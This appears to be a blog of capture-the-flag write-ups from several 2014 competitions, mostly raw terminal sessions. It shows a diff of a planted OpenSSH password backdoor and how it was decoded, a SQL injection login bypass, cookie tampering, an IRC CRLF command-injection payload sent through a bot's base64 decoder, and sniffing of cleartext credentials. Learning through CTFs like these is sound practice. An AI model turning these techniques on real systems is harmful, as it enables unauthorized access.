101 111 121 131 141 151 161 171 181 191 200 210 220 230 240 30 40 50 60 70 80 90
102 112 122 132 142 152 162 172 182 192 201 211 221 231 241 31 41 51 61 71 81 91
103 113 123 133 143 153 163 173 183 193 202 212 222 232 242 32 42 52 62 72 82 92
104 114 124 134 144 154 164 174 184 194 203 213 223 233 243 33 43 53 63 73 83 93
105 115 125 135 145 155 165 175 185 195 204 214 224 234 244 34 44 54 64 74 84 94
106 116 126 136 146 156 166 176 186 196 205 215 225 235 25 35 45 55 65 75 85 95
107 117 127 137 147 157 167 177 187 197 206 216 226 236 26 36 46 56 66 76 86 96
108 118 128 138 148 158 168 178 188 198 207 217 227 237 27 37 47 57 67 77 87 97

# file 1
1: gzip compressed data, was “key.txt”, from Unix, last modified: Wed Oct 1 01:00:52 2014

# file 10
10: gzip compressed data, was “key106.txt”, from Unix, last modified: Wed Oct 1 00:59:41 2014
root@kali:/media/test# gunzip 1
gzip: 1: unknown suffix — ignored
# mv 1 1.gz
# ls
10 11 12 13 14 15 16 17 18 19 1.gz 208 218 228 238 28 38 48 58 68 78 88 98
100 110 120 130 140 150 160 170 180 190 2 209 219 229 239 29 39 49 59 69 79 89 99
101 111 121 131 141 151 161 171 181 191 20 21 22 23 24 3 4 5 6 7 8 9 lost+found
102 112 122 132 142 152 162 172 182 192 200 210 220 230 240 30 40 50 60 70 80 90
103 113 123 133 143 153 163 173 183 193 201 211 221 231 241 31 41 51 61 71 81 91
104 114 124 134 144 154 164 174 184 194 202 212 222 232 242 32 42 52 62 72 82 92
105 115 125 135 145 155 165 175 185 195 203 213 223 233 243 33 43 53 63 73 83 93
106 116 126 136 146 156 166 176 186 196 204 214 224 234 244 34 44 54 64 74 84 94
107 117 127 137 147 157 167 177 187 197 205 215 225 235 25 35 45 55 65 75 85 95
108 118 128 138 148 158 168 178 188 198 206 216 226 236 26 36 46 56 66 76 86 96
109 119 129 139 149 159 169 179 189 199 207 217 227 237 27 37 47 57 67 77 87 97
# file 1.gz
1.gz: gzip compressed data, was “key.txt”, from Unix, last modified: Wed Oct 1 01:00:52 2014
# gunzip 1.gz
# ls
1 109 119 129 139 149 159 169 179 189 199 208 218 228 238 28 38 48 58 68 78 88 98
10 11 12 13 14 15 16 17 18 19 2 209 219 229 239 29 39 49 59 69 79 89 99
100 110 120 130 140 150 160 170 180 190 20 21 22 23 24 3 4 5 6 7 8 9 lost+found
101 111 121 131 141 151 161 171 181 191 200 210 220 230 240 30 40 50 60 70 80 90
102 112 122 132 142 152 162 172 182 192 201 211 221 231 241 31 41 51 61 71 81 91
103 113 123 133 143 153 163 173 183 193 202 212 222 232 242 32 42 52 62 72 82 92
104 114 124 134 144 154 164 174 184 194 203 213 223 233 243 33 43 53 63 73 83 93
105 115 125 135 145 155 165 175 185 195 204 214 224 234 244 34 44 54 64 74 84 94
106 116 126 136 146 156 166 176 186 196 205 215 225 235 25 35 45 55 65 75 85 95
107 117 127 137 147 157 167 177 187 197 206 216 226 236 26 36 46 56 66 76 86 96
108 118 128 138 148 158 168 178 188 198 207 217 227 237 27 37 47 57 67 77 87 97
# file 1
1: ASCII text
# cat 1
SECCON{@]NL7n+-s75FrET]vU=7Z}

 

 

 

PicoCTF 2014

Pico CTF 2014 finished up last week. It was a nice CTF running for about 2 weeks. This CTF was designed for middle and high school students. Challenges started out fairly easy compared to your average CTF but did get harder as you went along. I dare say many of the 100 plus point challenges are on par with many other CTF challenges.  Below I am going to include some quick writeup. Their were a huge number of challenges and my team was in and out of the CTF as time permits and since we could not be ranked was not a high priority. The write ups below are just the ones I personally did my team completed many more.

 

SSH BACK DOOR – 100

Some hackers have broken into my server backdoor.picoctf.com and locked my user out (my username is jon). I need to retrieve the flag.txt file from my home directory.
The last thing we noticed in out network logs show is the attacker downloading this. Can you figure out a way to get back into my account?

ssh jon@backdoor.picoctf.com
The authenticity of host ‘backdoor.picoctf.com (23.21.109.77)’ can’t be established.
ECDSA key fingerprint is 6d:3c:3a:7f:3e:04:97:85:84:78:83:d8:52:05:79:4e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ‘backdoor.picoctf.com,23.21.109.77’ (ECDSA) to the list of known hosts.
jon@backdoor.picoctf.com’s password:
download original tar.gz and run diff
diff hack orginginal/
diff hack/auth.c orginginal/auth.c
777,794d776
<
< static int frobcmp(const char *chk, const char *str) {
< int rc = 0;
< size_t len = strlen(str);
< char *s = xstrdup(str);
< memfrob(s, len);
<
< if (strcmp(chk, s) == 0) {
< rc = 1;
< }
<
< free(s);
< return rc;
< }
<
< int check_password(const char *password) {
< return frobcmp(“CGCDSE_XGKIBCDOY^OKFCDMSE_XLFKMY”, password);
< }
diff hack/auth.h orginginal/auth.h
214,215d213
< int check_password(const char *);
<
diff hack/auth-passwd.c orginginal/auth-passwd.c
115,117d114
< if (check_password(password)) {
< return ok;
< }

after much google and talks with teammates I found an explanation to the frobcmp function

The memfrob() function encrypts the first n bytes of the memory area s by exclusive-ORing each character with the number 42. The effect can be reversed by using memfrob() on the encrypted memory area.
Note that this function is not a proper encryption routine as the XOR constant is fixed, and is only suitable for hiding strings.

so convert each letter in the password to decimal
XOR with 42
and convert back to ascii

original
CGCDSE_XGKIBCDOY^OKFCDMSE_XLFKMY
decimal version
67 71 67 68 83 69 95 88 71 75 73 66 67 68 79 89 94 79 75 70 67 68 77 83 69 95 88 76 70 75 77 89
xor with 42
105 109 105 110 121 111 117 114 109 97 99 104 105 110 101 115 116 101 97 108 105 110 103 121 111 117 114 102 108 97 103 115
converted to ascii
i m i n y o u r m a c h i n e s t e a l i n g y o u r f l a g s
final ssh password
iminyourmachinestealingyourflags

login as jon via ssh and get flag
~/CTF/2014-picoctf/write right# ssh jon@backdoor.picoctf.com
jon@backdoor.picoctf.com’s password:
Last login: Wed Oct 29 01:16:37 2014 from pool-74-102-33-54.nwrknj.fios.verizon.net
jon@ip-10-45-162-116:~$ ls
flag.txt
jon@ip-10-45-162-116:~$ cat flag.txt
ssshhhhh_theres_a_backdoor
jon@ip-10-45-162-116:~$

 

Redacted – 50

You found a letter that may shed light on recent events.

Lets look at meta data

<original image>https://picoctf.com/problem-static/forensics/redacted/Redacted.pdf

exiftool Redacted.pdf
ExifTool Version Number : 8.60
File Name : Redacted.pdf
Directory : .
File Size : 879 kB
File Modification Date/Time : 2014:10:27 12:10:11-04:00
File Permissions : rw-r–r–
File Type : PDF
MIME Type : application/pdf
PDF Version : 1.3
Linearized : No
XMP Toolkit : XMP Core 5.4.0
Thumbnail Image : (Binary data 12625 bytes, use -b option to extract)
Thumbnail Width : 212
Thumbnail Height : 256
Thumbnail Format : JPEG
Metadata Date : 2014:10:25 16:28:24-04:00
Creator Tool : Adobe Illustrator CC 2014 (Macintosh)
Derived From Rendition Class : proof:pdf
Derived From Document ID : xmp.did:1b6690ed-28a8-c141-9479-b6a9cf6be651
Derived From Instance ID : uuid:d1c078a0-2746-42b2-b0d1-25aedff8fb1e
Derived From Original Document ID: uuid:5D20892493BFDB11914A8590D31508C8
Version ID : 1
Instance ID : uuid:4ab06236-d455-3341-afad-bba7a24d434b
History Software Agent : Adobe Illustrator CC 2014 (Macintosh)
History Changed : /
History When : 2014:10:25 16:28:15-04:00
History Instance ID : xmp.iid:533d6706-603a-42d6-978a-a21cc3522efd
History Action : saved
Document ID : xmp.did:533d6706-603a-42d6-978a-a21cc3522efd
Rendition Class : proof:pdf
Manifest Link Form : EmbedByReference
Manifest Reference Document ID : 0
Manifest Reference Instance ID : 0
Manifest Reference File Path : /Users/ryan/Desktop/Redacted1.png
Ingredients Document ID : 0
Ingredients Instance ID : 0
Ingredients File Path : /Users/ryan/Desktop/Redacted1.png
Original Document ID : uuid:5D20892493BFDB11914A8590D31508C8
N Pages : 1
Swatch Groups Group Name : Brights
Swatch Groups Group Type : 1
Swatch Groups Colorants Yellow : 0.003100
Swatch Groups Colorants Mode : CMYK
Swatch Groups Colorants Black : 0.003100
Swatch Groups Colorants Swatch Name: C=60 M=90 Y=0 K=0
Swatch Groups Colorants Cyan : 60.000000
Swatch Groups Colorants Magenta : 90.000000
Swatch Groups Colorants Type : PROCESS
Has Visible Transparency : False
Plate Names : Cyan, Magenta, Yellow, Black
Max Page Size W : 612.000000
Max Page Size H : 792.000000
Max Page Size Unit : Pixels
Has Visible Overprint : False
Format : application/pdf
Startup Profile : Print
GTS PDFX Version : PDF/X-1:2001
GTS PDFX Conformance : PDF/X-1a:2001
Trapped : False
Page Count : 1
Title : Redacted2
Producer : Mac OS X 10.9.5 Quartz PDFContext
Creator : Adobe Illustrator CC 2014 (Macintosh)
Create Date : 2014:10:25 20:30:54Z
Modify Date : 2014:10:25 20:30:54Z
Looks like this was originally an adobe illustrator document

Lets see if we can pull out the images

pdfimages -j Redacted.pdf out

<clean image>

there it is the secret one_two_three_four

 

Intercepted Post – 40

We intercepted some of your Dad’s web activity. Can you get a password from his traffic?. You can also view the traffic on CloudShark.

<packet image>

found
flag%7Bpl%24_%24%24l_y0ur_l0g1n_form%24%7D
doesnt work. convert from ascii character codes.
flag{pl$_$$l_y0ur_l0g1n_form$}

complete

Delicious! – 60

You have found the administrative control panel for the Daedalus Coperation Website: https://web.picoctf.com/delicious-5850932/login.php. Unfortunately, it requires that you be logged in. Can you find a way to convince the web site that you are, in fact, logged in?

page displays

Welcome! You’ve been here before.
Your session number is 67.
We’ll be tracking you using this number whenever you visit this site.
You’re not logged in. There are currently too many users logged in, so you will have to come back later to log in.
use burp suite to edit cookies and send with repeater. tried many 65 was the key.

< burp image>

Flag is session_cookies_are_the_most_delicious

 

Function Address – 60

We found this program file on some systems. But we need the address of the ‘find_string’ function to do anything useful! Can you find it for us?

open file with objdump and grep for function

objdump -d problem | grep find_string
08048444 <find_string>:
8048496: eb 29 jmp 80484c1 <find_string+0x7d>
80484b6: 75 05 jne 80484bd <find_string+0x79>
80484bb: eb 1a jmp 80484d7 <find_string+0x93>
80484d0: 7d c6 jge 8048498 <find_string+0x54>
8048511: e8 2e ff ff ff call 8048444 <find_string>
flag is 08048444

 

snapchat – 80

It was found that a Daedalus employee was storing his personal files on a work computer. Unfortunately, he corrupted the filesystem before we could prove it. Can you take a look? Download here.
recover data

foremost -i disk.img -o file.img
Processing: disk.img
|*|
root@kali:~/CTF/2014-picoctf/snapcat# ls
disk.img file.img output test
root@kali:~/CTF/2014-picoctf/snapcat# file file.img/
file.img/: directory
root@kali:~/CTF/2014-picoctf/snapcat# cd file.img/
root@kali:~/CTF/2014-picoctf/snapcat/file.img# ls
audit.txt jpg
root@kali:~/CTF/2014-picoctf/snapcat/file.img# cat audit.txt
Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus
Audit File

Foremost started at Mon Oct 27 20:23:29 2014
Invocation: foremost -i disk.img -o file.img
Output directory: /root/CTF/2014-picoctf/snapcat/file.img
Configuration file: /etc/foremost.conf
——————————————————————
File: disk.img
Start: Mon Oct 27 20:23:29 2014
Length: 5 MB (5242880 bytes)

Num Name (bs=512) Size File Offset Comment

0: 00000057.jpg 89 KB 29184
1: 00000237.jpg 13 KB 121344
2: 00000265.jpg 172 KB 135680
3: 00000613.jpg 34 KB 313856
4: 00000685.jpg 56 KB 350720
Finish: Mon Oct 27 20:23:29 2014

5 FILES EXTRACTED

jpg:= 5
——————————————————————

Foremost finished at Mon Oct 27 20:23:29 2014
root@kali:~/CTF/2014-picoctf/snapcat/file.img# ls
audit.txt jpg
root@kali:~/CTF/2014-picoctf/snapcat/file.img# cd jpg/
root@kali:~/CTF/2014-picoctf/snapcat/file.img/jpg# ls
00000057.jpg 00000237.jpg 00000265.jpg 00000613.jpg 00000685.jpg
root@kali:~/CTF/2014-picoctf/snapcat/file.img/jpg#

00000237

Injection1 – 90

Daedalus Corp. has been working on their login service, using a brand new SQL database to store all of the access credentials. Can you figure out how to login?

terminate SQL request with ‘# to bypass ( must be mysql )

use login:
admin’ #

error returns flag

Logged in!

Your flag is: flag_vFtTcLf7w2st5FM74b

 

PNG or Not? – 100

On a corner of the bookshelf, you find a small CD with an image file on it. It seems that this file is more than it appears, and some data has been hidden within. Can you find the hidden data?

image

run strings on image nothing important. Look at image via hex editor see proper PNG header and end. But more data after. Notice some flag.txt in the text

<hex editor image>

also notice 7z looks like a compressed file on the end.
tail end data off into another file and extract.
tail -c 138 image.png > test.7z

file test.7z
test.7z: 7-zip archive data, version 0.3

7z x test.7z

7-Zip [64] 9.20 Copyright (c) 1999-2010 Igor Pavlov 2010-11-18
p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,1 CPU)

Processing archive: test.7z

Extracting flag.txt

Everything is Ok

Size: 20
Compressed: 138
ls
flag.txt image.png test.7z
cat flag.txt
EKSi7MktjOpvwesurw0

 

 

 

Hack.lu 2014

This week my CTF team OverFlowSecurity was able to compete in hack.lu. This CTF seems to be very run and very challenging. Since this event was not over a weekend most our team could not commit a lot of time to it. We finished at a very respectable 80th place. I myself only concentrated on a single challenge based on an IRC bot. I actually learned a lot about how the IRC protocol works and in the end one of my teammates solved the challenge with our combined efforts. Below is a quick write up of the challenge. Next up for me is the PicoCTF in a week or so. It’s a long running (2 week) challenge.

 

Barmixing-Bot
by freddy (Misc)
200 (+80) Points

 

There’s a fun and quirky IRC bot to play with. It responds to commands in private chat but also in #hacklu-saloon on freenode. We think it’s involved in a devious scheme that distracts people to get their money pickpocketed. So be careful!

Bot was on an irc channel. Using !help in the channel or private message to bot gives you the list of commands accepted.

<barmixing-bot> Send messages to the bot or the channel starting with an exclamation mark. Known commands are list, status, karma, math, base64, base64d, rot13, ping, hack, request, list

Play around with commands for a while nothing of great interest. Using !base64 with a lot of characters showed it split the line into 2 lines. Spend some time on this.

Noticed that the bot is in a channel called #hacklu-secret-channel. This channel is invite only. So at this point I figured the goal was to get into this channel.

 

Also noticed this with the !rot13 function. Created a rot13 encoded string to send /invite H1tch #hacklu-secret-channel but this was just sent to the channel command not actually issued. Resorted to reading the RFC for IRC.

After reading docs and discussing my teammate suggested maybe we need to send the raw IRC commands to the bot. We had already been experimenting with the !base64d function that decoded base64 so we gave that a shot.

 

Encoded

aaa\r\nINVITE h1tch #hacklu-secret-channel

and sent to the bot via

!base64d YWFhXHJcbklOVklURSBoMXRjaCAjaGFja2x1LXNlY3JldC1jaGFubmVs

An invite was received by the bot and we were able to obtain the flag from the channel subject.

Flag GfeBNmN5XjwDvQB64qoqaEEeYogk4rGH3ikZ0qtc3B3HKLDoAH

DefCamp 2014 – Quest 100 –

or this My password is password but it is 2_*_10_*_16_*_8_*_4 characters long. Whats my password ? Ha ha ha!

This one I didn’t catch onto until almost the end when I had a doh moment.

The flag is the word password in MD5

 

flag: 5f4dcc3b5aa765d61d8327deb882cf99

DefCamp 2014 – Network 100 –

You were given an IP address and a HINT similar to guests are always allowed but the manager has a secret what is it.

SSH access was open for user guest password guest.

Once in you see a toolkit directory with tcpdump in it.

tcpdump -l -A | egrep -i ‘secret’
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
user=manager&pass=asecret
user=manager&pass=topsecretmanagerpassword
The secret is behind <strong>0f388689dc4728cfde0de9a1ee47c8d3</strong>. Don’t tell anyone!

an MD5 of  0f388689dc4728cfde0de9a1ee47c8d3 gives you the flag

FLAG:  ididyourmom

DefCamp 2014

overflow-bunny

Overflowsec
()_() (=’.’=) (>_<) () ()

 

Had a great time this weekend during DefCamp 2014. This was by third CTF and the first I was able to dedicated the required amount of time to. I participated with a great group of guys under the OverFlowsec team flag. Or bunny rabbit in this case. The teams were limited to 5 and I was happy to fill one of those slots. Overall we finished 36th out of a 600 teams so I feel pretty good about that.

 

The CTF seemed to be well run not a lot of issues overall. There were a few glitches here an there like other teams deleting parts of a challenge to prevent others from obtaining the flag and a machine or two that had some stability issues. This was a jeopardy style CTF that required a VPN to access the target machines. There were 20 challenges with 2 additional bonus challenges later in the event. We were able to take down all but 8. The categories were Quest, Web, Network, Exploit, Misc, and Bonus. Although these categories seem to be more of a guideline for example one of the network challenges I would consider more web and there were lots of other overlaps.

 

Overall a great CTF and a great learning experience for me. I would like to thank the organizers and the guys over OverFlowSec for putting up with me. I will post a couple write-ups to some of the challenges that I actually took some notes on.